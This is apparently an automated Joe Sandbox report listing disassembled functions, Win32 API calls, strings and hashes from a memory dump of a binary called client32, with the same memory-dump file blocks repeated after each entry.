FlashWindowEx, xrefs: 1101D32E

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: FlashWindowEx
API String ID: 199729137-2859592226
Opcode ID: bbe273fc43b33a73958d1f5ff023c045b956bd3b29a261bef0c34649876a7d0d
Instruction ID: 7fa6031e8bb94c9d2945b427b42de2899da1a72ad2875e3a9dcb47a7bac4ba5f
Opcode Fuzzy Hash: bbe273fc43b33a73958d1f5ff023c045b956bd3b29a261bef0c34649876a7d0d
Instruction Fuzzy Hash: 83E01272A412389FD324EBE9A848B4AF7E89B54765F01442AEA5597904C675E8408B90

Function 11001090 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010C7

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010A1
m_hWnd, xrefs: 110010A6

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitItemLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2046328329-2830328467
Opcode ID: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
Instruction ID: 55addf44b20248d1cdc7b1377ce96882c1c4f69405d532d8ba5fa0b62c56eca9
Opcode Fuzzy Hash: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
Instruction Fuzzy Hash: 8DE01AB661021DBFD714DE85EC81EEBB3ECEB49354F008529FA2A97240D6B0E850C7A5

Function 11001050 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,?,?,?), ref: 11001083

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001061
m_hWnd, xrefs: 11001066

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 819365019-2830328467
Opcode ID: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
Instruction ID: 50f06fe94c134d50a88b9402c61dae4da10641179b5ac6344e644b67b4693846
Opcode Fuzzy Hash: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
Instruction Fuzzy Hash: 6AE04FB5A00219BBD710DE95DC45EDBB3DCEB48354F00842AF92597240D6B0F84087A0

Function 110010E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

PostMessageA.USER32 ref: 11001113

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010F1
m_hWnd, xrefs: 110010F6

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastPostProcesswsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 906220102-2830328467
Opcode ID: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
Instruction ID: 934a8ee4ae924c1029923c78eea6d07b507986f249d0d3e5c029bc3c62824ea9
Opcode Fuzzy Hash: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
Instruction Fuzzy Hash: 98E04FB5A10219BFD704CA85DC46EDAB39CEB48754F00802AF92597200D6B0E84087A0

Function 110151A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00001014,?,?), ref: 110151D4

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 110151B6
e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151B1

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
API String ID: 819365019-3966830984
Opcode ID: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
Instruction ID: 66f1678c741d69056f24fb38e5f1926d93c7d4e0e7c38f0779b183b432510f86
Opcode Fuzzy Hash: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
Instruction Fuzzy Hash: 26E08675A403197BD310DA81DC46ED6F39CDB45714F008025F9595A240D6B1B94087A0

Function 110171F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000101C,?,00000000), ref: 11017222

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 11017206
e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11017201

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
API String ID: 819365019-3966830984
Opcode ID: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
Instruction ID: ca461658ff4ad9fd457e958dedcd80386c4d58b841a73ce1d2056031be29817f
Opcode Fuzzy Hash: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
Instruction Fuzzy Hash: 54E0C275A80329BBE2209681DC42FD6F38C9B05714F004435F6196A182D5B0F4408694

Function 11001BD0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,?,?), ref: 11001BFF

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001BE1
m_hWnd, xrefs: 11001BE6

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitInvalidateLastMessageProcessRectwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2776021309-2830328467
Opcode ID: 755a9776fea6f005391afbd423a88cadd0b6998a93535cd2b22780f3c32d3b99
Instruction ID: f329f54fccfbd903c35ddfc7245e55534a92ffb2c11cbd1515618277d015e5d1
Opcode Fuzzy Hash: 755a9776fea6f005391afbd423a88cadd0b6998a93535cd2b22780f3c32d3b99
Instruction Fuzzy Hash: 6BE0C2B5A00329BBD300DA81DC82EE7F3ACFB482A4F00C03AFC2556200E7B0E940C7A0

Function 11001120 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,?), ref: 1100114B

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001131
m_hWnd, xrefs: 11001136

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcessShowWindowwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 1604732272-2830328467
Opcode ID: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
Instruction ID: 819250d5e51c5ae6cd1eebd62df6884d4c995cad7bb4673794d6e20848bff6e8
Opcode Fuzzy Hash: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
Instruction Fuzzy Hash: A0D02BB191032D7BC3048A81DC42ED6F3CCEB04365F004036F62656100D670E440C3D4

Function 11001000 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19timeCOMMON

Download Yara Rule

APIs

KillTimer.USER32 ref: 1100102B

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
m_hWnd, xrefs: 11001016

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitKillLastMessageProcessTimerwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2229609774-2830328467
Opcode ID: 41ac2f8117c1c669daa6b7824a22dc0040faad1d84520ef1f3ec06ac7ff731c9
Instruction ID: 3936fa5a6487bcfb2675ba24450813cfe8c9b001fa673c8171921283ac7246b0
Opcode Fuzzy Hash: 41ac2f8117c1c669daa6b7824a22dc0040faad1d84520ef1f3ec06ac7ff731c9
Instruction Fuzzy Hash: C8D02BB66003287BD320D681DC41ED6F3CCD708354F004036F51956100D5B0E840C390

Function 1100D5E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19libraryCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(1100D85E,?,00000000,?,1100CB7A,?), ref: 1100D5E9
LoadLibraryA.KERNEL32(AudioCapture.dll), ref: 1100D5F8

Strings

AudioCapture.dll, xrefs: 1100D5F3

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoadVersion
String ID: AudioCapture.dll
API String ID: 3209957514-2642820777
Opcode ID: 047088f675874291a047ed730703cd504129d7fac9f2a2c6fa5c74864475883a
Instruction ID: 371e9eeab2a9ec736c68531bc0ba6d51211132de28c640fd63a90ee5c1cea0f0
Opcode Fuzzy Hash: 047088f675874291a047ed730703cd504129d7fac9f2a2c6fa5c74864475883a
Instruction Fuzzy Hash: BEE0173CA411678BFB028BF98C4839D7AE0A70468DFC400B0E83AC2948FB698440CF20

Function 11001B90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON

Download Yara Rule

APIs

ReleaseDC.USER32(?,?), ref: 11001BBB

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001BA1
m_hWnd, xrefs: 11001BA6

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcessReleasewsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 3704029381-2830328467
Opcode ID: 1bf9a444050f35cfe956e80297a3da14019c1d03f8e9835ee5d70418a9010044
Instruction ID: e79f40fb120e4deef42ce200f9e6c9239afd2a6aa69c55604b67f0d5db68f33b
Opcode Fuzzy Hash: 1bf9a444050f35cfe956e80297a3da14019c1d03f8e9835ee5d70418a9010044
Instruction Fuzzy Hash: 69D02BB16003287BD300C641DC41ED6F3CCE709264F00403AF91552500E6B0E44083D0

Function 11015580 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000), ref: 11015597
CloseHandle.KERNEL32(00000000), ref: 110155A8

Strings

\\.\NSWFPDrv, xrefs: 11015592

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

